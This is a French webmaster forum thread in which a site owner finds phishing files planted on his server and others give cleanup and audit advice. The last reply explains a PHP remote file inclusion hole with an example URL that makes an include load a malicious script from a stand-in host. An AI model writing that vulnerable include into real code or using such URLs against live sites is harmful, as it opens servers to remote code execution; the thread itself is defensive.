hacking

WRInaute occasionnel
Bonjour,
j'ai reçu un mail d'un organisme mandaté par une banque italienne m'indiquant que des plaintes de phishing avait été détectées sur une url hébergée sur mon site.... 8O :evil: :evil:

après vérification, il y a effectivement des fichiers déposés sur mon site par qqun d'autre que moi; après en avoir fait une copie, j'ai tout effacé et ai informé mon hébergeur en infogérence.

savez-vous ce que je risque concrètement ?

merci pour votre aide...
 
WRInaute discret
les risque juridique aucune idée, mais moi je suis passé par la meme experience que toi, mon hebergeur ma supprimé le site malgré que je suis innocent
 
Nouveau WRInaute
Si j'ai bien compris une personne a réussi à transférer des fichiers à lui sur ton site.....

Tu as fait attention à tes mots de passe !!!!
 
WRInaute impliqué
Ca dépend si tu es en mutualisé ou en serveur dédié,
Dans le 1er cas, ton hébergeur doit rechercher les failles qui ont permis de perçer le serveur. De ton coté tu dois vérifier si ton code php ne présente aucune faille. Faut regarder si tu as des projets 'open source' non patché, notamment.

Dans le 2ème cas, il faut que tu fasses cette recherche toi -même.
Dans tous les cas, ca va te prendre du temps à tout checker. Donc dans l'ordre,
- tu passes un anti-Rootkit comme Chkrootkit ou Rkhunter.
- Check les logs /var/log/secure, pour voir le hack a eu accès direct à un compte.
- Check tous les historisations de compte comme /root/.bash_history
- Check tes clés SSH, pour voir s'ils ne sont pas corrompus
- Check les logs ftp,
- Check le répertoire /tmp d'apache
- les logs apache avec un grep sur le répertoire ou tu t'es fais hacké.

Il faut tu aies les preuves que tu t'es fait hacké, déjà pour que tu apprennes un minimum sur cette expérience.

Dans les 2 cas, tu devrais immobiliser le serveur et refondre le système si un compte a été forcé.
 
WRInaute occasionnel
merci pour vos réponses. j'ai un serveur virtuels donc j'en suis responsable. mais ne sachant pas faire ce que tu évoques, j'ai un contrat de maintenanc een infogérence. Mon hébergeur est en train de vérifier. à Priori, il s'agirait d'une MAJ de webmin non faite. je vais changer tous les mots de passe.
 
WRInaute occasionnel
Jeviensderio a dit:
surtout aux includes

Plus précisément?

si tu as des urls du type call.php?fichier=accueil et que dans ton code tu fait un include $_GET['fichier'], bien vérifier que $_GET['fichier'] soit un de tes fichier car si j'appelle call.php?fichier=http://www.example.com/mon_fichier_malveillant.php je pourrai interpréter n'importe quel script sur ton serveur... (donc = pas bon)
 
Discussions similaires
Haut